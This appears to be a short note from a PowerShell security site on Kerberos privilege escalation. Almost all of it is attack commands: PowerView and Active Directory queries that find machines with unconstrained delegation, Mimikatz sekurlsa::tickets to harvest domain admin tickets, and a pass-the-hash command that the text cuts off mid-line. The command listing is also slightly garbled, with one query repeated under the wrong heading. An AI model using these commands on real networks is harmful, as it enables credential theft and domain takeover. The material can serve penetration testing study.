Powershell * POWERSHELL SECURITY

Privesc kerberos

Discover domain computers which have unconstrained delegation enabled using powerview : PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained Using active directory module : PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter {trustedfordelegation -eq $true} Run the following command on it to check if anyDA token is available: PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::tickets”‘ PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:administrator…